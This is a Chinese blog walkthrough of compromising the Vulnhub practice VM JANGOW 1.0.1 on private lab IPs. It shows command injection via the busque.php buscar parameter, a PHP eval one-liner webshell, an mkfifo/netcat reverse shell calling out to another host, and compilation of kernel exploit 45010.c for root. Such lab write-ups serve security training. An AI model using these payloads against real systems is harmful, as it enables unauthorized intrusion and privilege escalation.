当前位置:网站首页>【Vulnhub靶场】JANGOW: 1.0.1

【Vulnhub靶场】JANGOW: 1.0.1

2022-06-10 18:12:00 Nailaoyyds

目录

一、信息收集

nmap扫描

二、web渗透

 寻找功能点

写入一句话木马

三、 扩大战果

翻找敏感文件

四、 权限提升

做反弹shell

 提权

 蚁剑上传​编辑

 五、拿到flag

记一次kali双网卡IP不显示问题


一、信息收集

Jangow1.0.1靶机IP:192.168.56.118
kali攻击机IP:    192.168.56.102

开局是给IP的

nmap扫描

 

获取到目标主机开启的端口以及服务

二、web渗透

 寻找功能点

进去site文件,发现功能点
http://192.168.56.118/site/busque.php?buscar=
尝试命令执行whoami
http://192.168.56.118/site/busque.php?buscar=whoami
发现是可以执行命令的
查看密码文件
cat/etc/passwd

 

 但是只能查看文件,并不能登录。需要进行下一步操作

写入一句话木马

写入一句话木马
echo '<?php @eval ($_POST["123"]);?>' >>shell.php

蚁剑连接

三、 扩大战果

翻找敏感文件

 
 

四、 权限提升

 部分文件没有权限查看,做权限提升

做反弹shell

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.128 443 >/tmp/f');?>

做反弹shell

反弹成功

升级shell,变成交互式
python3 -c 'import pty;pty.spawn("/bin/bash")'

uname -a
获取版本号

 提权

根据系统版本提权
searchsploit ubuntu 4.4.0

采用45010.c这个文件进行提权

蚁剑将该文件上传到靶机

下载链接
https://gitee.com/jewels/Privilege-Escalation/repository/archive/master.zip

 

 蚁剑上传

gcc 45010.c -o exp //生成可执行文件

chmod +x exp //添加可执行权限

./exp   //执行exp文件

 

进入root目录
查找文件

 

 

 五、拿到flag

 

原网站

版权声明
本文为[Nailaoyyds]所创,转载请带上原文链接,感谢
https://blog.csdn.net/weixin_53095382/article/details/125100180